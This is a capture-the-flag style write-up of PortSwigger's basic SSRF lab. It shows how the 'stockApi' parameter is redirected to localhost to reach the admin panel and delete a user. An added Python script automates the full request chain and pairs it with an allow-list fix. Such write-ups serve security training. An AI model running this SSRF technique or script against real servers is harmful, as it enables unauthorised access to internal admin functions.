Lab 1: Basic SSRF against the local server
Write-up of Lab 1 on the Server-Side Request Forgery (SSRF) vulnerability from PortSwigger's Web Security Academy.
The application is a shop with multiple products. Clicking "View details" on a product and then "Check stock" makes the server query the product's inventory on our behalf; that server-side request is the feature we are going to abuse.
Intercepting the stock-check request in Burp Suite shows that the "stockApi" parameter carries the full URL the server fetches. Replacing it with a URL that points at the server itself, such as http://localhost/, returns the internal application's response verbatim, so we can reach the internal environment through the server. To solve the lab, we need to delete the user "carlos".

Requesting the /admin endpoint through stockApi returns the administrative panel, which is not reachable directly from the browser. The response lists two users, "carlos" and "wiener", each followed by an href pointing to the path that deletes that user.

With the delete path known, we send it through the same "stockApi" parameter so that the server issues the request against itself, and the lab is marked as solved.
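The chain above (point stockApi at the local server, read the admin panel, pull out the delete link, send it back through stockApi), as an added example in Python that is not part of the original write-up or of PortSwigger's lab code. It assumes the stock check is a POST to /product/stock carrying stockApi as a form field, and that the internal host is http://localhost; neither is stated on this page. The admin-panel HTML used for the offline functions is constructed here. For contrast, it also shows the allow-list check that would have rejected the payload; the allowed host in it is hypothetical.

```python
"""SSRF chain for a 'stock check' feature that fetches an attacker-supplied URL.

Added example: not code from the write-up or from the lab. Assumptions are
marked inline; nothing here is run against a real host unless solve() is called.
"""
from html.parser import HTMLParser
from typing import List, Optional
import urllib.parse
import urllib.request

# ASSUMED lab details (not stated on the page): the stock check is a POST to
# /product/stock whose form body carries the stockApi parameter as a full URL.
STOCK_ENDPOINT = "/product/stock"
STOCK_PARAM = "stockApi"
TARGET_USER = "carlos"  # the user the lab asks us to delete

# CONSTRUCTED sample of what the admin panel might return through the SSRF;
# the real panel's markup differs, only the delete hrefs matter here.
SAMPLE_ADMIN_HTML = """<h1>Users</h1>
<a href="/admin/delete?username=carlos">Delete carlos</a>
<a href="/admin/delete?username=wiener">Delete wiener</a>"""


def build_stock_body(internal_url: str) -> bytes:
    """Form-encode a stockApi value that points the server's fetcher at internal_url."""
    return urllib.parse.urlencode({STOCK_PARAM: internal_url}).encode()


class _HrefCollector(HTMLParser):
    """Collect every <a href> in a page; enough to locate the delete links."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def find_delete_path(admin_html: str, username: str) -> Optional[str]:
    """Return the href whose query names `username` for deletion, or None."""
    collector = _HrefCollector()
    collector.feed(admin_html)
    for href in collector.hrefs:
        params = urllib.parse.parse_qs(urllib.parse.urlparse(href).query)
        if "delete" in href and username in params.get("username", []):
            return href
    return None


def ssrf_fetch(lab_base: str, internal_url: str) -> str:
    """Make the lab server fetch internal_url and return whatever it saw."""
    req = urllib.request.Request(
        lab_base + STOCK_ENDPOINT, data=build_stock_body(internal_url), method="POST"
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def solve(lab_base: str, internal_base: str = "http://localhost") -> str:
    """Full chain: read /admin via SSRF, find carlos's delete link, trigger it via SSRF.

    Returns the internal URL that was sent through the server. Network access
    to a live lab instance is required; the offline helpers above are testable alone.
    """
    admin_html = ssrf_fetch(lab_base, internal_base + "/admin")
    path = find_delete_path(admin_html, TARGET_USER)
    if path is None:
        raise RuntimeError("no delete link for %s in the admin panel" % TARGET_USER)
    # Join against /admin/ so both absolute and relative hrefs resolve correctly.
    delete_url = urllib.parse.urljoin(internal_base + "/admin/", path)
    ssrf_fetch(lab_base, delete_url)
    return delete_url


# The fix side: a fetcher that only accepts URLs for a known stock service.
# HYPOTHETICAL allow-list host; a real deployment would name its own backend.
ALLOWED_STOCK_HOSTS = {"stock.example.net"}


def is_allowed_stock_url(url: str) -> bool:
    """Reject anything that is not an https URL to an allow-listed host.

    This blocks http://localhost/... outright. It does not by itself stop a
    DNS-rebinding host that resolves to an internal address; for that, resolve
    the name and check the address as well before fetching.
    """
    parts = urllib.parse.urlparse(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_STOCK_HOSTS


if __name__ == "__main__":
    # Offline demonstration of the parsing and the check; solve() needs a lab URL.
    print(build_stock_body("http://localhost/admin"))
    print(find_delete_path(SAMPLE_ADMIN_HTML, TARGET_USER))
    print(is_allowed_stock_url("http://localhost/admin"))
```

Running `solve("https://<your-lab-id>.web-security-academy.net")` performs the two SSRF requests in order; the first one is all that is needed to confirm the vulnerability, since the admin panel should never be reachable from an unauthenticated stock check.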